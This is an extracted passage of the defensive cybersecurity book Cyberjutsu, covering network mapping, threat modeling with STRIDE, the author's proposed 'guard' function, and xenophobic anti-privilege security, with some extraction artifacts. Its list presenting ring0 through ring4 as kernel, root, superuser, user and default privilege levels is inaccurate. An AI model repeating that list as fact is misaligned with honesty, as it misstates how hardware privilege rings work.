Cyberjutsu - Ecologia (2024)

Cyberjutsu

Cybersecurity for the Modern Ninja

Ben McCarty

Cyberjutsu

CYBERJUTSU

San Francisco

by Ben McCarty

C Y B E R J U T S U

C y b e r s e c u r i t y f o r t h e

M o d e r n N i n j a

CYBERJUTSU. Copyright © 2021 by Ben McCarty.

All rights reserved. No part of this work may be reproduced or transmitted in any form or by any

means, electronic or mechanical, including photocopying, recording, or by any information storage

or retrieval system, without the prior written permission of the copyright owner and the publisher.

ISBN-13: 978-1-7185-0054-9 (print)

ISBN-13: 978-1-7185-0055-6 (ebook)

Publisher: William Pollock

Executive Editor: Barbara Yien

Production Editor: Rachel Monaghan

Developmental Editors: Nic Albert and Athabasca Witschi

Project Editor: Dapinder Dosanjh

Cover Design: Octopod Studios

Cover Illustrator: Rick Reese

Technical Reviewer: Ari Schloss

Copyeditor: Paula L. Fleming

Interior Design and Composition: Maureen Forys, Happenstance Type-O-Rama

Proofreader: Holly Bauer Forsyth

Indexer: Beth Nauman-Montana

For information on book distributors or translations, please contact No Starch Press, Inc.

directly:

No Starch Press, Inc.

245 8th Street, San Francisco, CA 94103

phone: 1-415-863-9900; info@nostarch.com

www.nostarch.com

Library of Congress Cataloging-in-Publication Data

Names: McCarty, Ben, author.

Title: Cyberjutsu : cybersecurity for the modern ninja / Ben McCarty.

Description: San Francisco, CA : No Starch Press, [2021] | Includes

bibliographical references and index. | Summary: “Teaches ancient

approaches to modern information security issues based on authentic,

formerly classified ninja scrolls”-- Provided by publisher.

Identifiers: LCCN 2020052832 (print) | LCCN 2020052833 (ebook) | ISBN

9781718500549 (print) | ISBN 9781718500556 (ebook)

Subjects: LCSH: Computer security. | Computer networks--Security measures.

| Computer crimes--Prevention. | Ninjutsu.

Classification: LCC QA76.9.A25 M4249 2021 (print) | LCC QA76.9.A25

(ebook) | DDC 005.8--dc23

LC record available at https://lccn.loc.gov/2020052832

LC ebook record available at https://lccn.loc.gov/2020052833

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc.

Other product and company names mentioned herein may be the trademarks of their respective

owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we

are using the names only in an editorial fashion and to the benefit of the trademark owner, with

no intention of infringement of the trademark.

The information in this book is distributed on an “As Is” basis, without warranty. While every pre-

caution has been taken in the preparation of this work, neither the author nor No Starch Press,

Inc. shall have any liability to any person or entity with respect to any loss or damage caused or

alleged to be caused directly or indirectly by the information contained in it.

To my lovely Sarah

and to those helpless organizations

afraid of new ideas

and blind to their own weaknesses

for motivating me to write this book

About the Author

Ben McCarty is an ex-NSA developer and US Army veteran. He is one of

the first fully qualified Cyber Warfare Specialists (35Q) to serve in the

Army Network Warfare Battalion. During his career, he has worked as a

hacker, incident handler, threat hunter, malware analyst, network security

engineer, compliance auditor, threat intelligence professional, and capa-

bility developer. He holds multiple security patents and certifications. He

is currently a quantum security researcher in the Washington, DC, area.

About the Technical Reviewer

Ari Schloss started his cybersecurity career with the federal government

at the IRS and has contracted with DHS and CMS (Medicare). He has

experience in NIST 800-53/800-171 compliance, cyber security defense

operations, and forensics. He has a master’s degree in Information

Assurance and an MBA. He currently serves as a security engineer at a

defense contractor in Maryland.

B R I E F C O N T E N T S

Foreword . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii

Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix

Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi

Chapter 1: Mapping Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

Chapter 2: Guarding with Special Care . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

Chapter 3: Xenophobic Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

Chapter 4: Identification Challenge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

Chapter 5: Double-Sealed Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

Chapter 6: Hours of Infiltration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

Chapter 7: Access to Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57

Chapter 8: Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63

Chapter 9: Sensors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71

Chapter 10: Bridges and Ladders . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79

Chapter 11: Locks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85

Chapter 12: Moon on the Water . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91

Chapter 13: Worm Agent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

Chapter 14: Ghost on the Moon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107

Chapter 15: The Art of the Fireflies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113

Chapter 16: Live Capture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121

viiiBrief Contents

. 131

. 139

. 147

. . . . . . . . . . . . . . . . . . . . . . . 153

. 159

. 165

. 175

. 185

. 195

. 201

Chapter 17: Fire Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 18: Covert Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 19: Call Signs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 20: Light, Noise, and LitterDiscipline

Chapter 21: Circ*mstances of Infiltration . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 22: Zero-Days . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 23: Hiring Shinobi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 24: Guardhouse Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chapter 25: Zero-Trust Threat Management . . . . . . . . . . . . . . . . . . .

,

of the neighbor-

ing hosts, traffic flow, services, and protocols used on the network without

ever actively interacting with it.

Another method for mapping a network without directly interacting

with it is to collect a network admin’s emails as they leave the network,

searching for network maps of the target in an external file storage-

sharing environment, or looking in third-party troubleshooting help

forums where the admin may post logs/errors, router configurations,

network debugging/tracert/ping, or other technical details that dis-

close the layout and configuration of the network. Much like the ninja’s

uramittsu no jutsu technique, the exploitation of observable information

from a target’s network can be used to map it without alerting the target.

Passive mapping can include measuring the latency of recorded tracerts

from the network to identify satellite hops (for example, the presence

of a satellite is indicated by a sudden 500-millisecond increase in com-

munication delay) or detecting a firewall system’s deep-packet processing

(for example, the preprocessor recognizes a potential malicious attack

and adds perceptible delays to specially crafted communication). Passive

mapping might also include information disclosure of the internal net-

work from external DNS zones and record responses; public procure-

ment orders and purchase requests for certain software/hardware; or

even job postings for network/IT admins with experience in a specific

technology, networking equipment, or hardware/software.

After the attacker has spent so much time developing them, their

maps may be more complete than the target’s own—the adversary may

know more about the target’s network than the target does. To offset any

such advantage, network defenders should strive to develop and maintain

superior maps and keep them highly protected.

Creating Your Map

The map creation process can happen in three general steps:

1. Make the necessary investment to create a comprehensive, accu-

rate map that can be easily updated and securely stored. It should

contain the information necessary for each team’s use case (such

as IT, network operations center [NOC], and SOC). Consider

10Chapter 1

hiring a dedicated person or team, or an outside vendor, to make

and analyze the map.

2. Make the map, including the types of precise details specified in

the beginning of this chapter.

3. Request that the map be peer reviewed as part of change man-

agement requests, as well as whenever anyone notices an incon-

gruity in or divergence from the map.

Let’s take a closer look at the second step: making the map.

After you have identified all key stakeholders and persuaded them

that this project should be a priority, the first step is to gather anything

and everything your organization has internally that could help with

the mapping process. This includes wiring diagrams, old network archi-

tecture project plans, vulnerability scans, asset inventory lists, inventory

audits of the data center, DHCP leases, DNS records, SNMP network man-

agement data, endpoint agent records, packet captures (PCAP), SIEM

logs, router configurations, firewall rules, and network scans. Router

configurations should be the primary source for constructing the major

architecture and layout of your network map; consider starting by putting

your core/central router(s) in the middle of your map and branching out

from there. PCAP captures can reveal endpoints communicating on the

network that may not respond to network scans or that cannot be reached

by scans due to network filtering. After you allow select systems to collect

PCAP for an extended period in promiscuous mode, it will be possible to

review the list of endpoints found in the PCAP, as seen in Figure1-3.

Figure1-3: Wireshark screenshot of endpoints discovered during PCAP collection

Mapping Networks11

Ideally, PCAP collection should occur during network scans to vali-

date the reach of the scans. Also, multiple network scans should be con-

ducted, with a minimum of one endpoint per subnetwork conducting a

scan of its subnet; these scans can be manually stitched together into a

network map topology, as shown in Figure1-4. Identify items that can be

automated so this process is easier to repeat in the future.

Figure1-4: The Zenmap topology view of a scan of the 10.0.0.0/24 subnet

Once all the data has been collected, it will need to be processed,

analyzed, and merged. It will be useful to find out which source of data is

the most accurate as well as to identify data sources with unique and help-

ful information (for example, the last-seen-time of a device) before con-

solidating all the data. Also, any incongruities and discrepancies should

be investigated. These might include devices missing from the network,

rogue devices in the network, and strange network behavior or connec-

tions. If you discover that your network scanners were not able to pen-

etrate certain enclaves or subnets due to IP rules or intrusion prevention

systems (IPSes), consider requesting network changes to allow deeper and

more comprehensive scanning. A key outcome from this stage of the proj-

ect is the identification and location of all authorized and unauthorized

devices connected to your network—a huge accomplishment.

Evaluate software-mapping tools that can automatically ingest SNMP

data, network scans, and vulnerability scans and allow manual editing

12Chapter 1

to incorporate any additional data. The tool you choose should produce

a comprehensive, accurate, and detailed network map that meets your

stakeholders’ needs. Pick the best solution that will handle your data and

meet your budget.

Produce the map and test it. Test its usefulness during change man-

agement meetings/security incidents and network outage/debugging

events. Does it help resolve issues and find problems faster? Test its accu-

racy with traceroutes and tcpdumps over interfaces. To test the accuracy

with traceroutes, conduct internal and external traceroutes from differ-

ent network locations to see whether the hop points (routers) are present

in the map and flow logically according to your map. An example trace-

route is seen in Figure1-5.

Figure1-5: A Windows traceroute to example .com

See what your red team and blue team can do with your map. Collect

feedback and perform the mapping process again with the goal of pro-

ducing an even better map in less time.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable information, treasure, and people within your stronghold . You

receive credible threat intelligence that a ninja has thoroughly mapped your

castle and surrounding area, though it is unclear whether this activity was part

of active targeting or just passive reconnaissance . You don’t know what the

map looks like or how detailed it is . Your only map of the castle is an architec-

tural design plan that was used during initial construction—and was designed

for the builders and not for other users—but has since become out of date .

Mapping Networks13

What does the ninja’s map likely include that your map doesn’t? What

would the ninja know about your castle that you don’t, and how could that

information be used for infiltration? Who in your fiefdom would benefit from

access to the ninja’s map? Whom would you trust to map your castle in the

same way the ninja did, allowing you to see what the ninja sees?

Recommended Security Controls and Mitigations

Where relevant, each recommendation is presented with an applicable

security control from the NIST 800-53 standard, and it should be evalu-

ated with the idea of maps in mind.

1. Assign responsibilities for documenting a network map. Implement

policies and procedures to coordinate updates of the map between

teams. [CM-1: Configuration Management Policy and Procedures;

CM-3: Configuration Change Control | (4) Security Representative;

,

CM-9: Configuration Management Plan]

2. To establish a baseline, document the configuration of the net-

work’s topology, architecture, logical placement, and information

systems. [CM-2: Baseline Configuration]

3. Incorporate flaw identification (such as map inaccuracies) and reme-

diation (for example, of vulnerabilities inherent in the network archi-

tecture) into the network-mapping process. [SI-2: Flaw Remediation]

Debrief

In this chapter, you got a review of shinobi mapping objectives, map

standards, and mapping techniques as well as an overview of modern

network-mapping practices and technologies. Considering the impor-

tance ofnetwork maps, how to create (good) maps, and how attackers

collect intelligence on your system may have sparked your imagination,

and you may have thought of new data sources or techniques you could

use to map your own network and others’ networks.

In the next chapter, you will get a chance to use your network map

as a type of data flow diagram (DFD) to perform threat modeling. This

means you’ll identify areas in your network where a threat actor is likely

to attack it or bypass your defenses to infiltrate it. I’ll discuss the novel

ninja security technique of “guarding,” which can be used to defend

these weak points in your network.

2

G U A R D I N G W I T H

S P E C I A L C A R E

Even castles with strong fortifications

should be guarded, paying particular attention

to the recessed corners.

What shinobi should keep in mind when stealing into

a castle or camp are the naturally fortified and difficult

directions, the woods, and blind spots.

—Yoshimori Hyakushu #10

Shinobi were historically proficient infiltrators. The

ancient scrolls describe how to quickly identify and bru-

tally exploit weak spots in an enemy’s fortifications. The

scrolls also stress that shinobi should use higher-order

thinking to creatively apply their knowledge when build-

ing their own defenses. Bansenshūkai advises commanders

tasked with defending a camp or castle to identify, inspect, and guard with

special care the areas where shinobi are most likely to attempt entry, such

as the recessed corners of a castle’s stone walls, rubbish disposal areas,

water pipes, and nearby woods or bushes.1

16Chapter 2

Understanding Attack Vectors

Consider the castle’s wall an attack surface and weak points in the castle’s

wall (for example, the water pipe or poorly placed stones in the wall that

provide footholds) attack vectors. The term attack surface refers to all the

software, networks, and systems that the adversary has the opportunity to

attack. Any point within the attack surface can be an attack vector, or the

means an attacker uses to gain access. In cybersecurity, it’s always advis-

able to reduce your attack surface. That said, while reducing the castle

footprint would shrink the attack surface that needs to be defended, it

wouldn’t mitigate the amount of damage the adversary could inflict or

prevent any given attack vector from being exploited. Nonetheless, attack

surface reduction can make guarding the target easier.

Bansenshūkai’s volume on hidden infiltration includes a list of well-

intentioned defensive techniques, weapons, and modes of thought that

can actually expose a camp to risk. It implores commanders to consider

how everything in their environment could be used against them. For

example, the scroll instructs infiltrators to look for shinobi-gaeshi, spikes

set up around an enemy’s encampment to deter would-be attackers.2

Because defenders placed these spikes in locations they considered

vulnerable, the spikes’ presence told enemy shinobi where the defenses

were inadequate; defenders were essentially broadcasting their insecuri-

ties. Shinobi knew they could remove these spikes—doing so was rela-

tively easy, as they were almost always attached as an afterthought—and

gain passage through the weakest spot in the target’s perimeter.3

A succinct example of such security that is “bolted on” as an after-

thought is found in Microsoft Windows’ PowerShell. The multitude of

security features added on top of the .NET framework with each new

version of PowerShell do not address the product’s core flaws and, in fact,

have allowed threat actors to create an armory of tools and weapons that

can be used to infiltrate systems that support PowerShell. This is an excel-

lent case study for any security researcher wishing to examine shinobi-

gaeshi more closely.

The ancient castles still standing in Japan are not typically adorned

with spikes, but they do tend to have water pipes that are too small for

a human to climb through, perimeters cleared of vegetation, and no

recessed corners in the outer walls—all of which suggest that emperors,

taking their cues from shinobi, made efforts over time to eliminate these

vulnerabilities. However, while it is ideal to eliminate weaknesses so they

do not require guarding, it is not always possible.

In this chapter, we’ll discuss the concept of guarding and its pro-

posed place within the five functions of cybersecurity. We will then

Guarding with Special Care 17

discuss how to identify the vulnerable areas that may require guarding

with threat modeling.

The Concept of Guarding

Guarding is the act of exercising protective control over assets by observing

the environment, detecting threats, and taking preventative action. For

example, the lord of a castle identifies a fairly large water drainage pipe in

the castle wall as a weak point. The lord retains the pipe, which performs an

important function in allowing water to exit, but requires a guard to stand

nearby, preventing attackers from using the pipe as a means of access.

In general, organizations tend to keep cybersecurity staff in the dark

about weak systems, network blind spots, or vulnerable attack vectors

that should be guarded with special care. Some organizations assume it’s

entirely the cybersecurity staff’s responsibility to discover security flaws

in the network. Many stakeholders have not identified these attack vec-

tors in the first place, or if no commercial solution exists or no commonly

accepted countermeasure can be applied easily, they simply ignore the

weaknesses and hope they will not be exploited.

In some instances, management directs security personnel not to per-

form basic logging, scanning, or patching of legacy systems for fear that

touching them will disrupt business operations. In more political organi-

zations, it’s common for a threat to not be recognized as a valid concern

unless it’s identified through a formal documentation process. Imagine

seeing that a castle is missing its west wall, reporting this obvious vulner-

ability to the king, and having the king dismiss your concerns because his

guards have not mentioned it in their official reports.

Guarding Within a Cybersecurity Framework

The National Institute of Standards and Technology (NIST) Cybersecurity

Framework4 seeks to prevent these common missteps and improve organi-

zations’ resilience to cyber threats through five core cybersecurity func-

tions: identify, protect, detect, respond, and recover. These functions help

identify vulnerabilities in networks and systems by using common infor-

mation security tools and processes.

For instance, most organizations begin the process of identifying

weaknesses by conducting vulnerability or application scans of systems on

their network—this is the identify function. Effective and reliable, these

scans identify obvious security issues such as unpatched software, active

accounts with blank passwords, default factory credentials, unparameter-

ized input, and SSH ports open to the internet. Next comes the protect

18Chapter 2

function. Upon discovery of an unsecured system, the scanner documents

the problem, and then security staff fixes or mitigates the vulnerability

with patches; configuration changes; or long-term architectural, security

system, or software

,

implementations.

If the security staff is unable to protect a system that has been iden-

tified as an attack vector, I believe they should guard it through human

controls. However, a guard function is missing from the NIST framework.

Instead, we move straight to the detect function: the security staff attempts

to detect an adversary by monitoring and investigating anomalous events.

Once the security staff detects infiltration, only then do they execute the

respond function by containing the threat, neutralizing the threat, and

reporting it.

Last is the recovery function: restoring the systems and data to opera-

tional status, as well as improving their ability to resist future attacks.

While essential to a robust security profile, these safeguards are

prevention-, protection-, or response-based functions. The cybersecurity

industry rarely applies the concept of guarding—using human controls

and protection—to information systems, because it’s not feasible for a

human defender to manually inspect and approve every email, web page,

file, or packet that leaves or enters the environment in the way that a gate

guard could watch people or packages entering a building.

For example, computers with 1GB network connections can process

more than 100,000 packets per second, far more than any human could

inspect. Instead of using human guards, defenders either rely heavily on

automated security controls or simply accept/ignore risk as part of doing

business. Guarding can still be feasible within a modern digital network,

however, if guards are inserted only into areas that need special care and

attention, such as the most likely attack vectors. This is why threat model-

ing to identify these areas in your organization will be useful.

Threat Modeling

The closest thing to guarding in cybersecurity is threat hunting, which

involves vigorously seeking out indicators of infiltration in logs, forensic

data, and other observable evidence. Few organizations perform threat

hunting, and even in those that do, a hunter’s job is to detect, not guard.

Nonetheless, it’s important that cyber defenders go beyond the con-

ventional framework, continually imagining new ways in which networks

and information systems could be attacked, and implement the necessary

defenses. To this end, defenders can use threat modeling to implement

information flow controls and design safeguards against threats rather

than simply react to them.

Guarding with Special Care 19

Typically performed only by cyber-mature organizations, threat mod-

eling involves documenting a data flow diagram (DFD), which describes the

flow of data and processes inside systems. DFDs are typically documented

as a type of flowchart, but can be roughly represented by a detailed net-

work map. A DFD can be used as a tool for structured analysis of your

attack surface that allows you to think of attack scenarios within the

parameters of the documented information systems. It doesn’t require

vulnerability scanning, proving of the attack scenario by red teams, or

validation from a compliance framework, and organizations don’t need to

wait for a security incident to prove a threat model before acting to guard

against the vulnerability.

Understanding the modern cyber equivalents to “recessed corners

of a castle’s stone walls, rubbish disposal areas, water pipes, and nearby

woods or bushes” of your environment could help you identify attack vec-

tors that may need guarding with special care.

Consider this example: as part of their nightly duties, a security guard

pulls on every doorknob in an office to make sure the doors are locked. If

they find an unlocked door, they lock it, secure the keys, and file a secu-

rity incident ticket.

It is later determined that a security incident occurred because

door keys were copied or stolen, so the organization adds a second-level

authenticator control (such as a keypad or badge reader) to the doors,

changes the locks, and issues new keys. These new preventive security

controls satisfy compliance auditors, and the ticket reporting the unse-

cured doors is closed. The chief information security officer (CISO) even

hires a red team to perform a narrow-scope physical penetration test of

the new door-locking mechanisms, and the team confirms that they were

denied access because of the enhanced security measures.

However, once we conduct threat-modeling exercises, we identify that

it’s possible to push moveable ceiling tiles out of the way and climb over

the office wall, bypassing the new security measures altogether. To coun-

teract this, we could add controls, such as security cameras or motion

detectors in the ceiling crawl space, or we could install solid, tunnel-

resistant ceilings and floors. Guards could even be hired and trained

to look for evidence of disturbed ceiling tiles, ceiling particulate on

the floor, or footprints on the walls. Guarding against this threat would

require that guards be posted inside the room or stationed within the

ceiling crawl space, armed with the authority and tools to protect the

room from intruders.

The feasibility of implementing such countermeasures is low—you

might be laughed out of your manager’s office for even suggesting them.

It’s easy to see why organizations are more likely to accept or ignore

20Chapter 2

certain threats than attempt to repel them, and this is likely why the

NIST Cybersecurity Framework doesn’t include a guard function. If

thoughtfully informed by detailed threat modeling and carefully imple-

mented in a creative and deliberate manner, however, this guard-centric

mode of thinking can bolster the security of information systems and

networks.

An example of a scenario suitable for the implementation of the

guard function is in jump boxes. Jump boxes are systems that span

two ormore network boundaries, allowing administrators to log in

remotelyto the jump box from one network and “ jump” to another

network to gain access to it. The conventional cybersecurity framework

advises hardening jump box systems by patching all known vulner-

abilities, restricting access with various firewall rules, and monitoring

audit logs for anomalous events such as unauthorized access. However,

such technical controls are often attacked or bypassed. A guard, on the

other hand, could physically disconnect the internal network cable from

the other network and connect it directly only after verifying with the

administrator that they have approval to execute remote commands

against these systems. The guard could also actively monitor actions on

the machine in real time and forcibly terminate the session anytime they

observe malicious or unauthorized actions. Implementing the guard

function in this way might mean hiring a human guard to sit in the

data center to protect both physical and remote access to these sensitive

systems.

Using Threat Modeling to Find Potential

AttackVectors

The basic steps for identifying attack vectors are to follow the guide-

lines for threat modeling, starting with creating a DFD. Once potential

attack vectors are identified from the DFD, the shinobi scrolls recom-

mend inspecting them to determine what technical security controls

can be implemented to protect them. Then, as a last resort, use guards

to defend these areas as well. You can use the network map you made

in the previous chapter to help create the DFD or use it as a rough

substitute.

1. Model your information systems. Create an accurate DFD with the

help of your organization’s network, security, development, busi-

ness, and other IT system owners and experts. It does not need

to use Unified Modeling Language (UML) or other advanced

Guarding with Special Care 21

concepts—it simply needs to accurately represent your systems

and the information within them. Note that large, complex sys-

tems can easily take a team more than six months to diagram.

2. STRIDE and guard. STRIDE is a threat-modeling

,

methodology

developed by Microsoft5 to describe what could go wrong in an

information system. The acronym comes from the ways in which

an attacker could violate six properties of the system:

Spoofing Identity = Authentication

Tampering with Data = Integrity

Repudiation/Deniability = Nonrepudiation

Information Disclosure = Confidentiality

Denial of Service = Availability

Elevation of Privilege = Authorization

To use STRIDE, you will review your DFD and, at every point

where there is data input, data processing, data output, or other

data flows/rules, hypothesize how an adversary may threaten it.

For example, if a system requires a thumbprint to verify a user’s

identity before allowing access to the system, you might consider

how they could spoof the thumbprint to impersonate a different

user. Similarly, you could think about ways they could tamper

with the fingerprint database to insert their print, or you could

explore a scenario in which the attacker causes the fingerprint

scanner to go down, allowing unauthorized access through a

weaker authentication process.

After learning this framework, you can use it to challenge

any imagined threat models that do not accurately represent

your systems or scenarios that do not describe how a plausible

threat impacts a specific component, surface, or vector. This

may require inviting technical subject matter experts to threat-

modeling sessions.

Suppose, for example, that an organizational threat-modeling

session produces the following scenario: “The threat of malware

compromises the integrity of internal databases.”

This threat is not properly modeled. Among other pieces of

critical information, the scenario does not describe how mal-

ware could be delivered and installed. Nor does it describe how

the malware would compromise the integrity of the database:

does it encrypt, delete, or corrupt data? It does not describe

22Chapter 2

which vectors allow the threat to impact the system, and it

doesn’t consider the information flow and controls currently

in place or provide realistic countermeasures. If, for example,

we determined that the most plausible way to infect an internal

business database with malware would be through a malicious

USB drive, then security may need to draft policies detailing

how staff must use USB drives or install cameras to monitor

access to USB ports. The organization might decide to grant

security the ability to turn USBs on or off, dictate which drives

can interface with USBs, control the information flow and

direction of USB ports, inspect the files on USB drives before

granting access to the requestor, control access with hardware

or software locks, or even hot-glue the USB ports shut. Such

measures, resulting from thorough threat modeling, allow

security personnel to guard against specific threats with special

care, rather than having to accept the risk or being limited to

protect and detect functions.

3. Do not advertise bolted-on security. Threat modeling is an itera-

tive, infinite process of evaluating new threats and developing

protective countermeasures. In your haste to protect your sys-

tems, avoid the use of shinobi-gaeshi security controls—defensive

efforts that may backfire by drawing attention to your vulner-

able areas. Often because of time, resource, or operational

restrictions, you may have taken only half measures that a

motivated, sophisticated threat actor can defeat. For example,

hot glue in a USB port can be removed with isopropyl alco-

hol. Where possible, assess the viability of a pure security-first

defense approach.

In the USB threat example, the USB interacts with the hard-

ware abstraction layer (HAL) that sits below the OS kernel. It

cannot be fully protected or mitigated with software and policy

controls, as those exist above the kernel and can be bypassed.

Therefore, a more complete solution might be to implement a

motherboard and chassis configuration in which USB ports do

not even exist. In contrast, hot glue in the USB port advertises

to motivated threat actors that you have not properly addressed

the security of USBs, and it will likely be a successful attack

vector for them should they be able to pull it free—just as the

shinobi pulled out the spikes bolted onto pipes and walls in

ancienttimes.

Guarding with Special Care 23

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within your stronghold . You receive credible threat intelli-

gence that a ninja plans to infiltrate your castle and set fire to the food supply

in your dungeon . The dungeon has multiple ingress/egress points whereby

staff transport food, moving freely and without monitoring .

Consider what measures guards could take to protect food from a fire in

the basem*nt . What staffing changes could you implement to control human

interactions with the food and protect it from harm? What measures would

ensure that guards could quickly observe, report, and respond to fire in the

basem*nt? How could guards detect a ninja infiltrating the basem*nt, and

what architectural changes could be made to mitigate blind spots that allow

access to the food?

Note that while it would be advisable to have backup food supplies in

alternate locations or to store the food within fire-resistant material, for this

exercise, consider how guards could control and protect the food rather than

directly address the fire threat .

Recommended Security Controls and Mitigations

Where relevant, each recommendation is presented with an applicable

security control from the NIST 800-53 standard, and it should be evalu-

ated through the lens of guarding with special care.

1. Review the results of auditors, red team assessments, vulner-

ability scans, and incident reports to find vulnerabilities in your

environment that cannot be easily patched or mitigated with

controls (that is, those that require special guarding). [CA-2:

Security Assessments; CA-8: Penetration Testing; IR-6: Incident

Reporting | (2) Vulnerabilities Related to Incidents; RA-5:

Vulnerability Scanning]

2. Perform threat modeling of your environment to identify vulner-

abilities. Then determine which ones can be designed out of your

environment. Explore the concept of guarding security functions

and apply those controls to threats that cannot be easily purged.

[SA-8: Security Engineering Principles; SA-14: Criticality Analysis;

SA-15: Development Process, Standards, and Tools | (4) Threat

Modeling/Vulnerability Analysis; SA-17: Developer Security

Architecture and Design]

24Chapter 2

3. To deter, protect against, and ensure rapid response to threats,

hire real-time security personnel as guards and integrate them

into vulnerable areas of business operations. [IR-10: Integrated

Information Security Analysis Team]

Debrief

This chapter has helped you think about the places in a network environ-

ment that an adversary is likely to target for infiltration. You have also

been introduced to the concept of guarding with direct human interac-

tion between information systems and processes. You may have utilized

your network map from the previous chapter or created your own data

flow diagram (DFD) as a representation of your environment to identify

likely attack vectors and potential STRIDE threats that could be miti-

gated with guards.

In the next chapter, we’ll explore a “xenophobic” security concept

used by the ancient ninja that may hinder adversaries from finding any

common ground or footholds in your environment to even start their

attack vector process.

3

X E N O P H O B I C S E C U R I T Y

If you accept strangers without much thought, the enemy

shinobi may come in disguised as a stranger and seek

information from the inside.

If beggars or outcasts come near the guardhouse,

treat them in a rough way and clear them off.

—Yoshimori Hyakushu #91

In this chapter, we’ll explore the concept

,

of xenophobic

security—or security based on a distrust of outsiders—and

how it can be applied as a type of anti-privilege protection

domain. To illustrate this idea, we’ll consider the hostile

environment that shinobi had to navigate.

Shinobi trying to infiltrate villages and gather information in plain

sight faced a ubiquitous challenge: the pervasive xenophobia of the medi-

eval Japanese. The isolation of the country’s villages gave rise to unique

dialects, hairstyles, clothing, and other customs that made each com-

munity its own social ecosystem.1 The small populations in these remote

locales meant everyone usually knew everyone else and an outsider obvi-

ously did not fit in.2

As outsiders, the shinobi were routinely viewed with suspicion and

followed. They could not move freely around town, and they were often

26Chapter 3

prevented from renting rooms and purchasing food. Certainly, villagers

would not share information with them. The community’s xenophobia

reduced the shinobi to anti-privileged status.

Understanding Anti-Privilege

To grasp the significance of anti-privilege, let’s first examine the concept

of privilege, which in cybersecurity refers to the permissions a user has to

perform actions, such as reading or deleting a file. Modern computer sys-

tems have a ringed architecture with different levels of privilege:

ring4 Default (unprivileged)

ring3 Normal user (least privileged)

ring2 Superuser (admin)

ring1 Root (elevated privilege)

ring0 Kernel (system)

For example, a common villager (least privileged) or a cat (unprivi-

leged) may be able to leave the town any time they want. A village chief

with elevated privilege has the additional permissions to lock the town

gates at will. However, a foreigner suspected of mischief (anti-privilege)

could have less permission than a stray cat (unprivileged) and therefore

would not be allowed to leave the village.

This distinction between anti-privileged and unprivileged status is

important. In some computer systems, actions such as logging out are

considered unprivileged and are given by default to actors in all rings.

Untrustworthy processes/users can use these default unprivileged capa-

bilities to enable more malicious actions or operate somewhat freely to

further more sophisticated goals. On the other hand, by denying an anti-

privileged process from logging out, you may prevent it from clearing its

session history or evidence of its existence in the first place. Consider if

computer systems could adopt a ring5 (anti-privilege) security control.

Using our village as an example, one could speculatively force a suspected

shinobi to submit to searches and interrogation before being allowed to

leave the village. In this way, the village could catch thieves and spies.

Furthermore, by making infiltrators’ jobs that much more risky and

expensive, villages undoubtedly deterred hostile activity.

To infiltrate such a xenophobic village, a shinobi first had to memo-

rize and practice a range of culturally distinct disguises, becoming fluent

in the style of dress, dialect, grooming techniques, monetary customs,

and social mores unique to the location.

Xenophobic Security27

When the cultural disguise was mastered, the shinobi still needed to

have a convincing reason to be in the village; usually this was job related.

The Ninpiden describes how shinobi could appropriate a generic cover

story, perhaps claiming to be a monk on a spiritual journey, a merchant, a

beggar, or even a samurai traveling on orders from his lord. (Though also

recognized by villagers as an outsider, a samurai did not incur the same

level of distrust as a potential fugitive or bandit.)

While in disguise around people of the same job, class, or caste, shi-

nobi were advised to demonstrate enough knowledge to appear believable

in the profession but also to act dumb and in need of help to perform

common tasks. Feigning ignorance served to deceive a target about the

shinobi’s true intelligence while flattering the target’s own, causing them

to lower their guard and offer information freely. The Ninpiden lists spe-

cific targets shinobi should attempt to win over with these tactics, such

as local deputies, magistrates, doctors, monks, and others who may work

in the presence of the local lord or authority. These targets typically had

information valuable to the mission.3

Note that the social hierarchies of the medieval Japanese village

resemble the privilege ring structure in modern computer systems, or

even the layered segmentation of computer networks in which the outside

layers, like a DMZ, are the least trusted. Likewise, normal villagers (the

least privileged) would be unable to interact with the lord who is at the

center, or ring0.

We can apply the way shinobi identified likely targets to a cyberse-

curity context. Just as shinobi targeted those who were, metaphorically,

closer to ring0 or who had access to ring0, so will modern threat actors

target privileged classes of systems/users. Thus, defenders should con-

sider what the computer equivalents of such high-status individuals as

monks and magistrates are in their systems. Furthermore, you should

consider what disguises a modern threat actor might use to approach the

more privileged systems/users.

The Problem with Interoperability and

UniversalStandards

